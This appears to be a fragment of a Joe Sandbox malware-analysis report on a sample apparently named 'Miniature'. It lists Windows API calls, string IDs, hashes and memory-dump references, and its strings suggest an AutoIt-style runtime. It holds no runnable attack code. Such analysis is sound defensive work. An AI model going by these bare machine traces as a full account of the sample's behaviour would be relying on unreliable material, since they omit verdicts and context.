                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                            • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                            • Opcode ID: 1b53d653054e2fac7a2f92e8a787a4217eb7b0087b85895bb238657ed676592e
                                                                                                                                                                                                                                                                                            • Instruction ID: 6d2e6a79547fc2f6aa0ec82a3f56b86542d6b298b17e8e52ef86bc3d6410b4ed
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b53d653054e2fac7a2f92e8a787a4217eb7b0087b85895bb238657ed676592e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0610371900216FFEB14DFA4CC45BBE77A8BF0AB18F104106F925D61D0DB74AA84DBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C8493D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C84948
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8499F
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C849DD
                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00C84A1B
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C84A63
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C84A9E
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C84ACC
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                            • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                            • Opcode ID: e231000554742bb6036bb429113e5fc340f527b549e917e0437991f5d2e97ac5
                                                                                                                                                                                                                                                                                            • Instruction ID: f7da6e05c8d15caa3f8a2aba9725b8aef6e02dbf146824cfb92d6858a854f301
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e231000554742bb6036bb429113e5fc340f527b549e917e0437991f5d2e97ac5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 107105725082128FC714EF24C8809ABB7E4EF95758F40492DF8A697251EB30DE45DB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00C76395
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C763A7
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00C763BE
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C763D3
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C763D9
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C763E9
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C763EF
                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C76410
                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C7642A
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C76433
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7649A
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00C764D6
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C764DC
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C764E3
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C7653A
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C76547
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C7656C
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C76596
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00C90884
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00C9088F
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00C9089A
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00C908A5
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00C908B0
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00C908BB
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00C908C6
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00C908D1
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00C908DC
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00C908E7
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00C908F2
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00C908FD
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00C90908
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00C90913
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00C9091E
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00C90929
                                                                                                                                                                                                                                                                                            • GetCursorInfo.USER32(?), ref: 00C90939
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C9097B
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C30436
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00CE170C,00000FA0,0A96AC4E,?,?,?,?,00C52733,000000FF), ref: 00C3048C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C52733,000000FF), ref: 00C30497
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C52733,000000FF), ref: 00C304A8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C304BE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C304CC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C304DA
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C30505
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C30510
                                                                                                                                                                                                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00C30457
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C30413: __onexit.LIBCMT ref: 00C30419
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • InitializeConditionVariable, xrefs: 00C304B8
                                                                                                                                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C30492
                                                                                                                                                                                                                                                                                            • kernel32.dll, xrefs: 00C304A3
                                                                                                                                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 00C304D2
                                                                                                                                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 00C304C4
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                            • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                            • Opcode ID: 3307fcabd96b2ec6c250aac77affef1448e34e95a6e60ce3baab942a0fa0195e
                                                                                                                                                                                                                                                                                            • Instruction ID: 2d2c04ab47c75054ef29b57d018034103f42fc78a135223e4c2fdbb10318137f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3307fcabd96b2ec6c250aac77affef1448e34e95a6e60ce3baab942a0fa0195e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53E1E332A00556ABCF189FB4C8416EDBBB4BF54750F10C22AE46AE7250DB30AF85F790
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,00CADCD0), ref: 00C84F6C
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C84F80
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C84FDE
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C85039
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C85084
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C850EC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2FD52: _wcslen.LIBCMT ref: 00C2FD5D
                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00CD7C10,00000061), ref: 00C85188
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                            • Opcode ID: ac24f0c7c775e5012ac8bcce207000e14023f381aaccebaff12217ef33b814f6
                                                                                                                                                                                                                                                                                            • Instruction ID: 69aa786d420dcfb8cc5edff7e89219ede3a601447819d8e678c45c1a705186ad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac24f0c7c775e5012ac8bcce207000e14023f381aaccebaff12217ef33b814f6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77B124316087029FC714EF28C890A6EB7E5BF95728F50491DF5A6C3291EBB0DD84DB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9BBF8
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C9BC10
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C9BC34
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9BC60
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C9BC74
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C9BC96
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9BD92
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C80F4E: GetStdHandle.KERNEL32(000000F6), ref: 00C80F6D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9BDAB
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9BDC6
                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C9BE16
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00C9BE67
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C9BE99
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9BEAA
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9BEBC
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C9BECE
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C9BF43
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4a86794473b681377b7f2b450e322d26357d26d0aa41cae8bca9f79a98a5b8e5
                                                                                                                                                                                                                                                                                            • Instruction ID: 8517f3a17c16e66dc192c7166078d00b8fde8c3d426877b15f670a96d7537ac9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a86794473b681377b7f2b450e322d26357d26d0aa41cae8bca9f79a98a5b8e5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDF1C132504300AFCB14EF24D995B6EBBE5BF85314F18855DF89A8B2A2CB30ED45DB52
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00CADCD0), ref: 00C94B18
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C94B2A
                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00CADCD0), ref: 00C94B4F
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00CADCD0), ref: 00C94B9B
                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,00CADCD0), ref: 00C94C05
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000009), ref: 00C94CBF
                                                                                                                                                                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C94D25
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00C94D4F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00CE29C0), ref: 00C53F72
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00CE29C0), ref: 00C54022
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C54066
                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00C5406F
                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(00CE29C0,00000000,?,00000000,00000000,00000000), ref: 00C54082
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C5408E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,?), ref: 00CA7823
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CA7897
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CA78B9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA78CC
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00CA78ED
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C10000,00000000), ref: 00CA791C
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA7935
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00CA794E
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00CA7955
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CA796D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CA7985
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C12234: GetWindowLongW.USER32(?,000000EB), ref: 00C12242
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00CA9BA3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA80AE: ClientToScreen.USER32(?,?), ref: 00CA80D4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA80AE: GetWindowRect.USER32(?,?), ref: 00CA814A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA80AE: PtInRect.USER32(?,?,?), ref: 00CA815A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00CA9C0C
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CA9C17
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CA9C3A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CA9C81
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00CA9C9A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00CA9CB1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00CA9CD3
                                                                                                                                                                                                                                                                                            • DragFinish.SHELL32(?), ref: 00CA9CDA
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00CA9DCD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                            • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C8CEF5
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C8CF08
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C8CF1C
                                                                                                                                                                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C8CF35
                                                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C8CF78
                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C8CF8E
                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C8CF99
                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C8CFC9
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C8D021
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C8D035
                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00C8D040
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00CA66D6,?,?), ref: 00CA8FEE
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA8FFE
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA9009
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA9016
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00CA9024
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA9033
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00CA903C
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA9043
                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00CA66D6,?,?,00000000,?), ref: 00CA9054
                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CB0C04,?), ref: 00CA906D
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00CA907D
                                                                                                                                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00CA909D
                                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00CA90CD
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00CA90F5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CA910B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9C10E,?,?), ref: 00C9D415
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D451
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9C154
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9C1D2
                                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 00C9C26A
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C9C2DE
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C9C2FC
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C9C352
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C9C364
                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C9C382
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C9C3E3
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9C3F4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
